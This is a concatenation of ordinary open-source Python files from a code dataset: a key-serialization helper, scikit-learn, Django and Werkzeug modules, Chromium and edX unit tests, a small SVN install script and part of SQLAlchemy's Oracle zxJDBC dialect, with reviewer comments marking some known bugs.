            encoding=serialization.Encoding.DER,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption())

    def export_private(self, path, passwd=None):
        """
        Write the private key to the given file, protecting it with the
        optional password.
        """
        if passwd is None:
            enc = serialization.NoEncryption()
        else:
            enc = serialization.BestAvailableEncryption(passwd)
        pem = self.key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=enc)
        with open(path, 'wb') as f:
            f.write(pem)

    def sign_digest(self, digest):
        """Return the actual signature"""
        # NOTE(review): cryptography's X25519PrivateKey is a key-exchange key
        # and does not expose .sign(); verify this code path is ever exercised.
        return self.key.sign(data=digest)

    def verify_digest(self, signature, digest):
        """Verify that signature is valid for given digest"""
        k = self.key
        if isinstance(self.key, x25519.X25519PrivateKey):
            k = self.key.public_key()
        return k.verify(signature=signature, data=digest)
| apache-2.0 |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sklearn/__init__.py | 2 | 3135 | """
Machine Learning module in python
=================================
sklearn is a Python module integrating classical machine
learning algorithms in the tightly-knit world of scientific Python
packages (numpy, scipy, matplotlib).
It aims to provide simple and efficient solutions to learning problems
that are accessible to everybody and reusable in various contexts:
machine-learning as a versatile tool for science and engineering.
See http://scikit-learn.sourceforge.net for complete documentation.
"""
import sys
__version__ = '0.12.1'
# Decide whether we are inside the package build (setup.py) or a normal
# import, and only wire up the test entry point in the latter case.
try:
    # This variable is injected in the __builtins__ by the build
    # process. It used to enable importing subpackages of sklearn when
    # the binaries are not built
    __SKLEARN_SETUP__
except NameError:
    __SKLEARN_SETUP__ = False

if __SKLEARN_SETUP__:
    sys.stderr.write('Partial import of sklearn during the build process.\n')
    # We are not importing the rest of the scikit during the build
    # process, as it may not be compiled yet
else:
    from . import __check_build
    from .base import clone
    try:
        from numpy.testing import nosetester

        class _NoseTester(nosetester.NoseTester):
            """ Subclass numpy's NoseTester to add doctests by default
            """

            def test(self, label='fast', verbose=1, extra_argv=['--exe'],
                     doctests=True, coverage=False):
                """Run the full test suite

                Examples
                --------
                This will run the test suite and stop at the first failing
                example
                >>> from sklearn import test
                >>> test(extra_argv=['--exe', '-sx']) #doctest: +SKIP
                """
                return super(_NoseTester, self).test(label=label, verbose=verbose,
                                                     extra_argv=extra_argv,
                                                     doctests=doctests, coverage=coverage)

        try:
            test = _NoseTester(raise_warnings="release").test
        except TypeError:
            # Older versions of numpy do not have a raise_warnings argument
            test = _NoseTester().test
        del nosetester
    except:
        # NOTE(review): bare except silently hides any failure to set up the
        # test entry point (not just a missing numpy.testing) — consider
        # narrowing to `except Exception` upstream.
        pass
__all__ = ['cross_validation', 'cluster', 'covariance',
'datasets', 'decomposition', 'feature_extraction',
'feature_selection', 'semi_supervised',
'gaussian_process', 'grid_search', 'hmm', 'lda', 'linear_model',
'metrics', 'mixture', 'naive_bayes', 'neighbors', 'pipeline',
'preprocessing', 'qda', 'svm', 'test', 'clone', 'pls']
def setup_module(module):
    """Fixture for the tests to assure globally controllable seeding of RNGs

    The seed is taken from the SKLEARN_SEED environment variable when set,
    otherwise drawn at random; both numpy's and the stdlib's RNGs are seeded.
    """
    import os
    import numpy as np
    import random

    # It could have been provided in the environment
    _random_seed = os.environ.get('SKLEARN_SEED', None)
    if _random_seed is None:
        _random_seed = np.random.uniform() * (2 ** 31 - 1)
    _random_seed = int(_random_seed)
    # Use the function-call form of print: valid on both Python 2 and 3,
    # whereas the original `print "..."` statement is Python-2-only syntax.
    print("I: Seeding RNGs with %r" % _random_seed)
    np.random.seed(_random_seed)
    random.seed(_random_seed)
| agpl-3.0 |
ThinkingBridge/platform_external_chromium_org | build/android/pylib/base/base_test_result_unittest.py | 61 | 2679 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for TestRunResults."""
import unittest
from base_test_result import BaseTestResult
from base_test_result import TestRunResults
from base_test_result import ResultType
class TestTestRunResults(unittest.TestCase):
  """Tests for TestRunResults aggregation, query methods and report forms."""

  def setUp(self):
    # NOTE(review): 'other_p1' shares the name 'p1' with self.p1 and the tests
    # below expect only one 'p1' in GetAll() — presumably BaseTestResult
    # equality is name-based; confirm against base_test_result.
    self.p1 = BaseTestResult('p1', ResultType.PASS, log='pass1')
    other_p1 = BaseTestResult('p1', ResultType.PASS)
    self.p2 = BaseTestResult('p2', ResultType.PASS)
    self.f1 = BaseTestResult('f1', ResultType.FAIL, log='failure1')
    self.c1 = BaseTestResult('c1', ResultType.CRASH, log='crash1')
    self.u1 = BaseTestResult('u1', ResultType.UNKNOWN)
    self.tr = TestRunResults()
    self.tr.AddResult(self.p1)
    self.tr.AddResult(other_p1)
    self.tr.AddResult(self.p2)
    self.tr.AddResults(set([self.f1, self.c1, self.u1]))

  def testGetAll(self):
    # An empty symmetric_difference means GetAll() equals exactly this set.
    self.assertFalse(
        self.tr.GetAll().symmetric_difference(
            [self.p1, self.p2, self.f1, self.c1, self.u1]))

  def testGetPass(self):
    self.assertFalse(self.tr.GetPass().symmetric_difference(
        [self.p1, self.p2]))

  def testGetNotPass(self):
    self.assertFalse(self.tr.GetNotPass().symmetric_difference(
        [self.f1, self.c1, self.u1]))

  def testGetAddTestRunResults(self):
    # Merging another TestRunResults must union results without duplicates.
    tr2 = TestRunResults()
    other_p1 = BaseTestResult('p1', ResultType.PASS)
    f2 = BaseTestResult('f2', ResultType.FAIL)
    tr2.AddResult(other_p1)
    tr2.AddResult(f2)
    tr2.AddTestRunResults(self.tr)
    self.assertFalse(
        tr2.GetAll().symmetric_difference(
            [self.p1, self.p2, self.f1, self.c1, self.u1, f2]))

  def testGetLogs(self):
    # Only non-passing results with logs appear in the log report.
    log_print = ('[FAIL] f1:\n'
                 'failure1\n'
                 '[CRASH] c1:\n'
                 'crash1')
    self.assertEqual(self.tr.GetLogs(), log_print)

  def testGetShortForm(self):
    short_print = ('ALL: 5 PASS: 2 FAIL: 1 '
                   'CRASH: 1 TIMEOUT: 0 UNKNOWN: 1 ')
    self.assertEqual(self.tr.GetShortForm(), short_print)

  def testGetLongForm(self):
    long_print = ('ALL (5 tests)\n'
                  'PASS (2 tests)\n'
                  'FAIL (1 tests): [f1]\n'
                  'CRASH (1 tests): [c1]\n'
                  'TIMEOUT (0 tests): []\n'
                  'UNKNOWN (1 tests): [u1]')
    self.assertEqual(self.tr.GetLongForm(), long_print)

  def testRunPassed(self):
    # A run with any non-pass result fails; an empty run counts as passed.
    self.assertFalse(self.tr.DidRunPass())
    tr2 = TestRunResults()
    self.assertTrue(tr2.DidRunPass())
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
nanolearningllc/edx-platform-cypress-2 | lms/djangoapps/lms_xblock/test/test_runtime.py | 92 | 6099 | """
Tests of the LMS XBlock Runtime and associated utilities
"""
from django.contrib.auth.models import User
from django.conf import settings
from ddt import ddt, data
from mock import Mock
from unittest import TestCase
from urlparse import urlparse
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from lms.djangoapps.lms_xblock.runtime import quote_slashes, unquote_slashes, LmsModuleSystem
from xblock.fields import ScopeIds
TEST_STRINGS = [
'',
'foobar',
'foo/bar',
'foo/bar;',
'foo;;bar',
'foo;_bar',
'foo/',
'/bar',
'foo//bar',
'foo;;;bar',
]
@ddt
class TestQuoteSlashes(TestCase):
    """Test the quote_slashes and unquote_slashes functions"""

    @data(*TEST_STRINGS)
    def test_inverse(self, test_string):
        # Round-tripping through quote/unquote must be the identity.
        self.assertEquals(test_string, unquote_slashes(quote_slashes(test_string)))

    @data(*TEST_STRINGS)
    def test_escaped(self, test_string):
        # The quoted form must never contain a literal '/'.
        self.assertNotIn('/', quote_slashes(test_string))
class TestHandlerUrl(TestCase):
    """Test the LMS handler_url"""

    def setUp(self):
        super(TestHandlerUrl, self).setUp()
        self.block = Mock(name='block', scope_ids=ScopeIds(None, None, None, 'dummy'))
        self.course_key = SlashSeparatedCourseKey("org", "course", "run")
        self.runtime = LmsModuleSystem(
            static_url='/static',
            track_function=Mock(),
            get_module=Mock(),
            render_template=Mock(),
            replace_urls=str,
            course_id=self.course_key,
            descriptor_runtime=Mock(),
        )

    def test_trailing_characters(self):
        # Generated handler URLs must never end in '?' or '/', regardless of
        # which optional pieces (suffix, query) are supplied.
        self.assertFalse(self.runtime.handler_url(self.block, 'handler').endswith('?'))
        self.assertFalse(self.runtime.handler_url(self.block, 'handler').endswith('/'))

        self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix').endswith('?'))
        self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix').endswith('/'))

        self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix', 'query').endswith('?'))
        self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix', 'query').endswith('/'))

        self.assertFalse(self.runtime.handler_url(self.block, 'handler', query='query').endswith('?'))
        self.assertFalse(self.runtime.handler_url(self.block, 'handler', query='query').endswith('/'))

    def _parsed_query(self, query_string):
        """Return the parsed query string from a handler_url generated with the supplied query_string"""
        return urlparse(self.runtime.handler_url(self.block, 'handler', query=query_string)).query

    def test_query_string(self):
        # The query argument must be passed through verbatim.
        self.assertIn('foo=bar', self._parsed_query('foo=bar'))
        self.assertIn('foo=bar&baz=true', self._parsed_query('foo=bar&baz=true'))
        self.assertIn('foo&bar&baz', self._parsed_query('foo&bar&baz'))

    def _parsed_path(self, handler_name='handler', suffix=''):
        """Return the parsed path from a handler_url with the supplied handler_name and suffix"""
        return urlparse(self.runtime.handler_url(self.block, handler_name, suffix=suffix)).path

    def test_suffix(self):
        # The suffix must be appended to the path unmodified.
        self.assertTrue(self._parsed_path(suffix="foo").endswith('foo'))
        self.assertTrue(self._parsed_path(suffix="foo/bar").endswith('foo/bar'))
        self.assertTrue(self._parsed_path(suffix="/foo/bar").endswith('/foo/bar'))

    def test_handler_name(self):
        self.assertIn('handler1', self._parsed_path('handler1'))
        self.assertIn('handler_a', self._parsed_path('handler_a'))

    def test_thirdparty_fq(self):
        """Testing the Fully-Qualified URL returned by thirdparty=True"""
        parsed_fq_url = urlparse(self.runtime.handler_url(self.block, 'handler', thirdparty=True))
        self.assertEqual(parsed_fq_url.scheme, 'https')
        self.assertEqual(parsed_fq_url.hostname, settings.SITE_NAME)

    def test_not_thirdparty_rel(self):
        """Testing the Fully-Qualified URL returned by thirdparty=False"""
        parsed_fq_url = urlparse(self.runtime.handler_url(self.block, 'handler', thirdparty=False))
        self.assertEqual(parsed_fq_url.scheme, '')
        self.assertIsNone(parsed_fq_url.hostname)
class TestUserServiceAPI(TestCase):
    """Test the user service interface"""

    def setUp(self):
        super(TestUserServiceAPI, self).setUp()
        self.course_id = SlashSeparatedCourseKey("org", "course", "run")
        self.user = User(username='runtime_robot', email='runtime_robot@edx.org', password='test', first_name='Robot')
        self.user.save()

        def mock_get_real_user(_anon_id):
            """Just returns the test user"""
            return self.user

        self.runtime = LmsModuleSystem(
            static_url='/static',
            track_function=Mock(),
            get_module=Mock(),
            render_template=Mock(),
            replace_urls=str,
            course_id=self.course_id,
            get_real_user=mock_get_real_user,
            descriptor_runtime=Mock(),
        )
        self.scope = 'course'
        self.key = 'key1'

        self.mock_block = Mock()
        self.mock_block.service_declaration.return_value = 'needs'

    def test_get_set_tag(self):
        # test for when we haven't set the tag yet
        tag = self.runtime.service(self.mock_block, 'user_tags').get_tag(self.scope, self.key)
        self.assertIsNone(tag)

        # set the tag
        set_value = 'value'
        self.runtime.service(self.mock_block, 'user_tags').set_tag(self.scope, self.key, set_value)
        tag = self.runtime.service(self.mock_block, 'user_tags').get_tag(self.scope, self.key)
        self.assertEqual(tag, set_value)

        # Try to set tag in wrong scope
        with self.assertRaises(ValueError):
            self.runtime.service(self.mock_block, 'user_tags').set_tag('fake_scope', self.key, set_value)

        # Try to get tag in wrong scope
        with self.assertRaises(ValueError):
            self.runtime.service(self.mock_block, 'user_tags').get_tag('fake_scope', self.key)
| agpl-3.0 |
morissette/devopsdays-hackathon-2016 | venv/lib/python2.7/site-packages/werkzeug/posixemulation.py | 364 | 3519 | # -*- coding: utf-8 -*-
r"""
werkzeug.posixemulation
~~~~~~~~~~~~~~~~~~~~~~~
Provides a POSIX emulation for some features that are relevant to
web applications. The main purpose is to simplify support for
systems such as Windows NT that are not 100% POSIX compatible.
Currently this only implements a :func:`rename` function that
follows POSIX semantics. Eg: if the target file already exists it
will be replaced without asking.
This module was introduced in 0.6.1 and is not a public interface.
It might become one in later versions of Werkzeug.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys
import os
import errno
import time
import random
from ._compat import to_unicode
from .filesystem import get_filesystem_encoding
can_rename_open_file = False
if os.name == 'nt':  # pragma: no cover
    # Placeholders that report failure; replaced by the real Win32
    # implementations below when ctypes is available.
    def _rename(src, dst):
        return False

    def _rename_atomic(src, dst):
        return False

    try:
        import ctypes

        _MOVEFILE_REPLACE_EXISTING = 0x1
        _MOVEFILE_WRITE_THROUGH = 0x8
        _MoveFileEx = ctypes.windll.kernel32.MoveFileExW

        def _rename(src, dst):
            """Replace dst with src via MoveFileEx, retrying briefly on failure."""
            src = to_unicode(src, get_filesystem_encoding())
            dst = to_unicode(dst, get_filesystem_encoding())
            if _rename_atomic(src, dst):
                return True
            retry = 0
            rv = False
            while not rv and retry < 100:
                rv = _MoveFileEx(src, dst, _MOVEFILE_REPLACE_EXISTING |
                                 _MOVEFILE_WRITE_THROUGH)
                if not rv:
                    time.sleep(0.001)
                    retry += 1
            return rv

        # new in Vista and Windows Server 2008
        _CreateTransaction = ctypes.windll.ktmw32.CreateTransaction
        _CommitTransaction = ctypes.windll.ktmw32.CommitTransaction
        _MoveFileTransacted = ctypes.windll.kernel32.MoveFileTransactedW
        _CloseHandle = ctypes.windll.kernel32.CloseHandle
        can_rename_open_file = True

        def _rename_atomic(src, dst):
            """Rename inside a kernel transaction (Vista+), retrying briefly."""
            ta = _CreateTransaction(None, 0, 0, 0, 0, 1000, 'Werkzeug rename')
            if ta == -1:
                return False
            try:
                retry = 0
                rv = False
                while not rv and retry < 100:
                    rv = _MoveFileTransacted(src, dst, None, None,
                                             _MOVEFILE_REPLACE_EXISTING |
                                             _MOVEFILE_WRITE_THROUGH, ta)
                    if rv:
                        rv = _CommitTransaction(ta)
                        break
                    else:
                        time.sleep(0.001)
                        retry += 1
                return rv
            finally:
                _CloseHandle(ta)
    except Exception:
        # Deliberate best-effort: without ctypes/Win32 APIs we fall back to
        # the "move away and replace" strategy in rename() below.
        pass

    def rename(src, dst):
        """POSIX-semantics rename for Windows: silently replaces dst."""
        # Try atomic or pseudo-atomic rename
        if _rename(src, dst):
            return
        # Fall back to "move away and replace"
        try:
            os.rename(src, dst)
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise
            # sys.maxsize instead of the Python-2-only sys.maxint: works on
            # both Python 2.6+ and Python 3 (where maxint was removed).
            old = "%s-%08x" % (dst, random.randint(0, sys.maxsize))
            os.rename(dst, old)
            os.rename(src, dst)
            try:
                os.unlink(old)
            except Exception:
                pass
else:
    rename = os.rename
    can_rename_open_file = True
| gpl-3.0 |
yephper/django | django/contrib/gis/db/backends/spatialite/introspection.py | 1 | 3203 | from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import (
DatabaseIntrospection, FlexibleFieldLookupDict,
)
from django.utils import six
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
    """
    Subclass that extends the `base_data_types_reverse` dict with the
    geometry column types, all of which map to GeometryField.
    """
    base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
    base_data_types_reverse.update(dict.fromkeys(
        ['point', 'linestring', 'polygon', 'multipoint',
         'multilinestring', 'multipolygon', 'geometrycollection'],
        'GeometryField'))
class SpatiaLiteIntrospection(DatabaseIntrospection):
    # Map database column types (including geometry types) back to Django fields.
    data_types_reverse = GeoFlexibleFieldLookupDict()

    def get_geometry_type(self, table_name, geo_col):
        """Return (field_type, field_params) for the geometry column
        `geo_col` of `table_name`, based on SpatiaLite's `geometry_columns`
        metadata table. Raises if the column is not registered there."""
        cursor = self.connection.cursor()
        try:
            # Querying the `geometry_columns` table to get additional metadata.
            # SpatiaLite renamed the column 'type' to 'geometry_type' in 4.0.
            type_col = 'type' if self.connection.ops.spatial_version < (4, 0, 0) else 'geometry_type'
            cursor.execute('SELECT coord_dimension, srid, %s '
                           'FROM geometry_columns '
                           'WHERE f_table_name=%%s AND f_geometry_column=%%s' % type_col,
                           (table_name, geo_col))
            row = cursor.fetchone()
            if not row:
                raise Exception('Could not find a geometry column for "%s"."%s"' %
                                (table_name, geo_col))

            # OGRGeomType does not require GDAL and makes it easy to convert
            # from OGC geom type name to Django field.
            ogr_type = row[2]
            if isinstance(ogr_type, six.integer_types) and ogr_type > 1000:
                # Spatialite versions >= 4 use the new SFSQL 1.2 offsets
                # 1000 (Z), 2000 (M), and 3000 (ZM) to indicate the presence of
                # higher dimensional coordinates (M not yet supported by Django).
                ogr_type = ogr_type % 1000 + OGRGeomType.wkb25bit
            field_type = OGRGeomType(ogr_type).django

            # Getting any GeometryField keyword arguments that are not the default.
            dim = row[0]
            srid = row[1]
            field_params = {}
            if srid != 4326:
                field_params['srid'] = srid
            if (isinstance(dim, six.string_types) and 'Z' in dim) or dim == 3:
                field_params['dim'] = 3
        finally:
            # Always release the cursor, even when metadata lookup fails.
            cursor.close()
        return field_type, field_params

    def get_indexes(self, cursor, table_name):
        """Extend the base index introspection with SpatiaLite spatial
        indexes (rows with spatial_index_enabled=1 in geometry_columns)."""
        indexes = super(SpatiaLiteIntrospection, self).get_indexes(cursor, table_name)
        cursor.execute('SELECT f_geometry_column '
                       'FROM geometry_columns '
                       'WHERE f_table_name=%s AND spatial_index_enabled=1', (table_name,))
        for row in cursor.fetchall():
            indexes[row[0]] = {'primary_key': False, 'unique': False}
        return indexes
| bsd-3-clause |
guettli/django | django/apps/config.py | 6 | 8251 | import os
from importlib import import_module
from django.core.exceptions import ImproperlyConfigured
from django.utils._os import upath
from django.utils.module_loading import module_has_submodule
MODELS_MODULE_NAME = 'models'
class AppConfig(object):
    """
    Class representing a Django application and its configuration.
    """
    def __init__(self, app_name, app_module):
        # Full Python path to the application eg. 'django.contrib.admin'.
        self.name = app_name
        # Root module for the application eg. <module 'django.contrib.admin'
        # from 'django/contrib/admin/__init__.pyc'>.
        self.module = app_module
        # Reference to the Apps registry that holds this AppConfig. Set by the
        # registry when it registers the AppConfig instance.
        self.apps = None
        # The following attributes could be defined at the class level in a
        # subclass, hence the test-and-set pattern.
        # Last component of the Python path to the application eg. 'admin'.
        # This value must be unique across a Django project.
        if not hasattr(self, 'label'):
            self.label = app_name.rpartition(".")[2]
        # Human-readable name for the application eg. "Admin".
        if not hasattr(self, 'verbose_name'):
            self.verbose_name = self.label.title()
        # Filesystem path to the application directory eg.
        # u'/usr/lib/python2.7/dist-packages/django/contrib/admin'. Unicode on
        # Python 2 and a str on Python 3.
        if not hasattr(self, 'path'):
            self.path = self._path_from_module(app_module)
        # Module containing models eg. <module 'django.contrib.admin.models'
        # from 'django/contrib/admin/models.pyc'>. Set by import_models().
        # None if the application doesn't have a models module.
        self.models_module = None
        # Mapping of lower case model names to model classes. Initially set to
        # None to prevent accidental access before import_models() runs.
        self.models = None
    def __repr__(self):
        """Return '<AppConfig: label>' for debugging output."""
        return '<%s: %s>' % (self.__class__.__name__, self.label)
    def _path_from_module(self, module):
        """Attempt to determine app's filesystem path from its module."""
        # See #21874 for extended discussion of the behavior of this method in
        # various cases.
        # Convert paths to list because Python 3's _NamespacePath does not
        # support indexing.
        paths = list(getattr(module, '__path__', []))
        if len(paths) != 1:
            filename = getattr(module, '__file__', None)
            if filename is not None:
                paths = [os.path.dirname(filename)]
            else:
                # For unknown reasons, sometimes the list returned by __path__
                # contains duplicates that must be removed (#25246).
                paths = list(set(paths))
        if len(paths) > 1:
            raise ImproperlyConfigured(
                "The app module %r has multiple filesystem locations (%r); "
                "you must configure this app with an AppConfig subclass "
                "with a 'path' class attribute." % (module, paths))
        elif not paths:
            raise ImproperlyConfigured(
                "The app module %r has no filesystem location, "
                "you must configure this app with an AppConfig subclass "
                "with a 'path' class attribute." % (module,))
        return upath(paths[0])
    @classmethod
    def create(cls, entry):
        """
        Factory that creates an app config from an entry in INSTALLED_APPS.

        The entry may be either the dotted path of an app module (optionally
        redirected through its ``default_app_config``) or the dotted path of
        an AppConfig subclass; both forms are tried in turn.
        """
        try:
            # If import_module succeeds, entry is a path to an app module,
            # which may specify an app config class with default_app_config.
            # Otherwise, entry is a path to an app config class or an error.
            module = import_module(entry)
        except ImportError:
            # Track that importing as an app module failed. If importing as an
            # app config class fails too, we'll trigger the ImportError again.
            module = None
            mod_path, _, cls_name = entry.rpartition('.')
            # Raise the original exception when entry cannot be a path to an
            # app config class.
            if not mod_path:
                raise
        else:
            try:
                # If this works, the app module specifies an app config class.
                entry = module.default_app_config
            except AttributeError:
                # Otherwise, it simply uses the default app config class.
                return cls(entry, module)
            else:
                mod_path, _, cls_name = entry.rpartition('.')
        # If we're reaching this point, we must attempt to load the app config
        # class located at <mod_path>.<cls_name>
        mod = import_module(mod_path)
        try:
            cls = getattr(mod, cls_name)
        except AttributeError:
            if module is None:
                # If importing as an app module failed, that error probably
                # contains the most informative traceback. Trigger it again.
                import_module(entry)
            else:
                raise
        # Check for obvious errors. (This check prevents duck typing, but
        # it could be removed if it became a problem in practice.)
        if not issubclass(cls, AppConfig):
            raise ImproperlyConfigured(
                "'%s' isn't a subclass of AppConfig." % entry)
        # Obtain app name here rather than in AppClass.__init__ to keep
        # all error checking for entries in INSTALLED_APPS in one place.
        try:
            app_name = cls.name
        except AttributeError:
            raise ImproperlyConfigured(
                "'%s' must supply a name attribute." % entry)
        # Ensure app_name points to a valid module.
        try:
            app_module = import_module(app_name)
        except ImportError:
            raise ImproperlyConfigured(
                "Cannot import '%s'. Check that '%s.%s.name' is correct." % (
                    app_name, mod_path, cls_name,
                )
            )
        # Entry is a path to an app config class.
        return cls(app_name, app_module)
    def get_model(self, model_name, require_ready=True):
        """
        Returns the model with the given case-insensitive model_name.
        Raises LookupError if no model exists with this name.
        """
        if require_ready:
            self.apps.check_models_ready()
        else:
            self.apps.check_apps_ready()
        try:
            return self.models[model_name.lower()]
        except KeyError:
            raise LookupError(
                "App '%s' doesn't have a '%s' model." % (self.label, model_name))
    def get_models(self, include_auto_created=False, include_swapped=False):
        """
        Returns an iterable of models.
        By default, the following models aren't included:
        - auto-created models for many-to-many relations without
          an explicit intermediate table,
        - models created to satisfy deferred attribute queries,
        - models that have been swapped out.
        Set the corresponding keyword argument to True to include such models.
        Keyword arguments aren't documented; they're a private API.
        """
        self.apps.check_models_ready()
        # Generator: callers can filter lazily without materializing a list.
        for model in self.models.values():
            if model._meta.auto_created and not include_auto_created:
                continue
            if model._meta.swapped and not include_swapped:
                continue
            yield model
    def import_models(self):
        """Populate self.models and import the app's models module, if any."""
        # Dictionary of models for this app, primarily maintained in the
        # 'all_models' attribute of the Apps this AppConfig is attached to.
        self.models = self.apps.all_models[self.label]
        if module_has_submodule(self.module, MODELS_MODULE_NAME):
            models_module_name = '%s.%s' % (self.name, MODELS_MODULE_NAME)
            self.models_module = import_module(models_module_name)
    def ready(self):
        """
        Override this method in subclasses to run code when Django starts.
        """
| bsd-3-clause |
tamsekar/eazy-deploy | svn/svn-install.py | 1 | 1095 | #!/usr/bin/env python
from sys import platform
import subprocess
from subprocess import Popen, PIPE
import sys
def platform_check(): 
    """Print and return a human-readable name for the current OS.

    :returns: one of "Linux", "OS X", "Windows" or "Unknown OS".

    The original used Python-2-only ``print`` statements and listed the
    historical "linux2" value separately; ``startswith("linux")`` covers
    both and remains correct on Python 3 (where the value is "linux").
    """
    if platform.startswith("linux"):
        name = "Linux"
    elif platform == "darwin":
        name = "OS X"
    elif platform == "win32":
        name = "Windows"
    else:
        name = "Unknown OS"
    print(name)
    return name
def linux_distribution():
    """Best-effort (distname, version, id) tuple for the running distro.

    Returns the string "N/A" when the information cannot be obtained.

    Bug fixed: the top-of-file ``from sys import platform`` shadows the
    ``platform`` *module* with a string, so ``platform.linux_distribution()``
    always raised AttributeError and the bare ``except`` silently hid it.
    The module is imported here under an unshadowed name; note that
    ``linux_distribution`` itself was removed from the stdlib in Python 3.8,
    in which case "N/A" is returned as before.
    """
    try:
        import platform as platform_module
        return platform_module.linux_distribution()
    except Exception:
        return "N/A"
# Print interpreter/platform diagnostics at import time.
# NOTE: the top-of-file ``from sys import platform`` shadows the
# ``platform`` *module* with a string, so the original calls such as
# ``platform.dist()`` raised AttributeError and crashed the script.
# The module is re-imported here under an unshadowed name, and each
# probe is guarded because several APIs (``dist``, ``linux_distribution``)
# were removed from the stdlib in Python 3.8.
import platform as _platform_module
def _probe(getter):
    """Return getter()'s value, or "N/A" when the API is missing/broken."""
    try:
        return getter()
    except Exception:
        return "N/A"
print("""Python version: %s
dist: %s
linux_distribution: %s
system: %s
machine: %s
platform: %s
uname: %s
version: %s
mac_ver: %s
""" % (
    sys.version.split('\n'),
    _probe(lambda: str(_platform_module.dist())),
    _probe(linux_distribution),
    _probe(_platform_module.system),
    _probe(_platform_module.machine),
    _probe(_platform_module.platform),
    _probe(_platform_module.uname),
    _probe(_platform_module.version),
    _probe(_platform_module.mac_ver),
))
def call_shell(cmd='syspack.sh'):
    """Run *cmd* and raise if it reports an error.

    :param cmd: program name or an argv list; defaults to the historical
        ``syspack.sh`` helper so existing callers are unaffected.
    :raises Exception: when the command writes to stderr or exits non-zero.

    Improvements over the original: the command is parameterized, and a
    failing command that produced no stderr output (non-zero exit status)
    is no longer silently ignored.
    """
    argv = list(cmd) if isinstance(cmd, (list, tuple)) else [cmd]
    session = subprocess.Popen(argv, stdout=PIPE, stderr=PIPE)
    stdout, stderr = session.communicate()
    if stderr or session.returncode != 0:
        raise Exception("Error " + str(stderr))
def main():
    """Entry point: report the OS, run the install helper, probe the distro."""
    platform_check()
    call_shell()
    # NOTE(review): the return value is discarded here; presumably this was
    # meant to be printed or logged — confirm intent.
    linux_distribution()
if __name__ == "__main__":
    main()
| gpl-3.0 |
aduric/crossfit | nonrel/django/contrib/sessions/middleware.py | 323 | 1888 | import time
from django.conf import settings
from django.utils.cache import patch_vary_headers
from django.utils.http import cookie_date
from django.utils.importlib import import_module
class SessionMiddleware(object):
    """Attach a session to each request and persist it on the response."""
    def process_request(self, request):
        # SESSION_ENGINE names the backend module providing SessionStore
        # (db, cache, file, ...); a missing cookie yields a new session.
        engine = import_module(settings.SESSION_ENGINE)
        session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME, None)
        request.session = engine.SessionStore(session_key)
    def process_response(self, request, response):
        """
        If request.session was modified, or if the configuration is to save the
        session every time, save the changes and set a session cookie.
        """
        try:
            accessed = request.session.accessed
            modified = request.session.modified
        except AttributeError:
            # request.session was removed (or never set); nothing to persist.
            pass
        else:
            if accessed:
                # Once the session was read, the response varies by cookie.
                patch_vary_headers(response, ('Cookie',))
            if modified or settings.SESSION_SAVE_EVERY_REQUEST:
                if request.session.get_expire_at_browser_close():
                    # Browser-session cookie: no explicit expiry.
                    max_age = None
                    expires = None
                else:
                    max_age = request.session.get_expiry_age()
                    expires_time = time.time() + max_age
                    expires = cookie_date(expires_time)
                # Save the session data and refresh the client cookie.
                request.session.save()
                response.set_cookie(settings.SESSION_COOKIE_NAME,
                        request.session.session_key, max_age=max_age,
                        expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,
                        path=settings.SESSION_COOKIE_PATH,
                        secure=settings.SESSION_COOKIE_SECURE or None,
                        httponly=settings.SESSION_COOKIE_HTTPONLY or None)
        return response
| bsd-3-clause |
wujuguang/sqlalchemy | lib/sqlalchemy/dialects/oracle/zxjdbc.py | 2 | 8207 | # oracle/zxjdbc.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: oracle+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: oracle+zxjdbc://user:pass@host/dbname
:driverurl: http://www.oracle.com/technetwork/database/features/jdbc/index-091264.html
.. note:: Jython is not supported by current versions of SQLAlchemy. The
zxjdbc dialect should be considered as experimental.
""" # noqa
import collections
import decimal
import re
from .base import OracleCompiler
from .base import OracleDialect
from .base import OracleExecutionContext
from ... import sql
from ... import types as sqltypes
from ... import util
from ...connectors.zxJDBC import ZxJDBCConnector
from ...engine import result as _result
from ...sql import expression
SQLException = zxJDBC = None
class _ZxJDBCDate(sqltypes.Date):
    """Date type that trims zxJDBC's datetime results down to ``date``."""

    def result_processor(self, dialect, coltype):
        def to_date(raw):
            # The driver hands back datetime objects; keep the date part only.
            return None if raw is None else raw.date()

        return to_date
class _ZxJDBCNumeric(sqltypes.Numeric):
    """Numeric type coercing zxJDBC results according to ``asdecimal``."""

    def result_processor(self, dialect, coltype):
        # XXX: does the dialect return Decimal or not???
        # if it does (in all cases), we could use a None processor as well as
        # the to_float generic processor
        if self.asdecimal:
            def convert(raw):
                # Ensure a Decimal comes back, converting via str when needed.
                if isinstance(raw, decimal.Decimal):
                    return raw
                return decimal.Decimal(str(raw))
        else:
            def convert(raw):
                # Ensure a float comes back for Decimal inputs; pass through
                # everything else untouched.
                if isinstance(raw, decimal.Decimal):
                    return float(raw)
                return raw

        return convert
class OracleCompiler_zxjdbc(OracleCompiler):
    """Statement compiler adding zxJDBC-specific RETURNING support."""
    def returning_clause(self, stmt, returning_cols):
